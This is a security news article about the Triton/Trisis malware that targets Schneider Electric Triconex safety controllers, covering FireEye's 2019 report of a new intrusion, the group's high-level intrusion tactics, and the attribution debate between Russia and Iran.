From recently published research by FireEye indicates that the hackers behind the Triton malware are active once more. The group rose to the public’s attention in 2017 when the malware was used to target a petrochemical plant in Saudi Arabia. In this instance, according to research conducted by Symantec, it is believed that the attack was meant to cause physical damage at the industrial site. The attack was close to causing severe damage at the facility, but Triton's activities inadvertently closed down the plant due to its manipulation of SIS systems which caused them to enter a failed safe state.
Triton, sometimes of referred to as Trisis was specifically engineered to target a specific type of industrial control system (ICS), namely Triconex safety instrumented systems (SIS) controllers developed by Schneider Electric. The malware is named after the specific safety instrumented system it targets. Triton is unusual in the sense that it hones on processes with the aim to shut them down, resulting in the tampering with safety systems which could result in damage been caused to industrial systems resulting damage to machinery. Malware designed for such a purpose is relatively rare and forms only a handful of the threats faced on the current landscape. Previously seen examples include Stuxnet and Industroyer with the latter being a highly customizable piece of malware which can be equipped to better suit the attacker’s needs. Stuxnet was seen targeting nuclear power stations while Industroyer was seen targeting more conventional power stations.
Returning back to Triton, it would seem that the failed attempt on the Saudi Petrochemical plant did not deter the group operating the malware. On April 10, 2019, the security firm revealed a yet to be named company was a victim of the Triton malware. The company is described by the firm as a “critical infrastructure facility” and the operators of Triton were present on the relevant systems for approximately a year. While FireEye has remained tight-lipped on certain details they have revealed some key details concerning the Triton group's infiltration tactics. The first step to the attack is gaining a foothold on the corporate side of the network, this is because the corporate side is seen as potentially more vulnerable. Once this achieved the hackers will look to gain access to the industrial side. What makes this step possible is the hackers will not steal any data, take any screenshots, or use any form of keylogger making it difficult to detect the intrusion.
The hackers look to move laterally across the network, in order to do this they must remain undetected and while performing network reconnaissance to see how to penetrate the industrial side of the target company. To do this the hackers use a variety of both generic and custom tools. The use of the tools is also unique in the sense the attackers will switch between tools to avoid antivirus packages and other security measures. An example given by researchers’ details how the hackers using different custom backdoors and switching between them depending on which network was targeted in order to gain access to that network. Further, the hacker group uses Mimikatz, a public tool, and SecHack, a custom tool to harvest credentials. These are then used in combination with renamed files to appear legitimate and both web shells and SSH tunnels to perform their covert activities and to drop additional tools.
Only once the hackers have gained access to the SIS controllers does it deploy the Triton malware. SIS, or safety instrumented system, controllers have engineered sets of both hardware and software used to control critical processes and keep them running at levels regarded as safe. They are used to provide protection against high fuel gas pressure initiates action to close the main fuel gas valve, high reactor temperature initiates action to open a cooling media valve, and high distillation column pressure initiates action to open a pressure vent valve any tampering with such software controlling the hardware can result in serious safety concerns and plant shutdowns.
To further assist in the hackers' overall plans is that they are only active on the network during off-work times. In the case investigated by FireEye, The hackers also gained access to the victim's distributed control system (DCS) which would have provided information on plant operations and processes. However, the group ignored this and focused solely on the SIS controller. While the Triton malware itself is not believed to have been deployed on the victim's system, finding traces of the hacking group behind the dangerous malware would have certainly been a serious cause for concern and certainly warrants the attention given to it by the researchers involved.
Who Operates Triton?
Towards the end of 2018 FireEye attributed the use of Triton to a group in Russia. With high confidence, the security firm traced the operators to the Central Scientific Research Institute of Chemistry and Mechanics. The institute is a government-owned technical research institution located in Moscow, was involved in these attacks. It is important to note that FireEye's report does not link the Triton malware itself to CNIIHM, but the secondary malware strains used by TEMP.Veles and deployed during the incidents where Triton was deployed. Clues in these secondary malware strains used to aid the deployment of the main Triton payloads contained enough artifacts that allowed researchers to identify their source.
It is believed by researchers that based on CNIIHM's self-described mission and other public information, the research lab had both the tools and expertise to develop this type of malware as well as the Triton malware, but also reasons to do so because of its ties to various Russian military and critical infrastructure apparatus. However, there are some InfoSec experts who have attributed the Triton malware to operators in Iran, namely based on the geopolitical reality between Iran and Saudi Arabia and that the reason for a Russian group to target a Saudi facility is as yet unknown.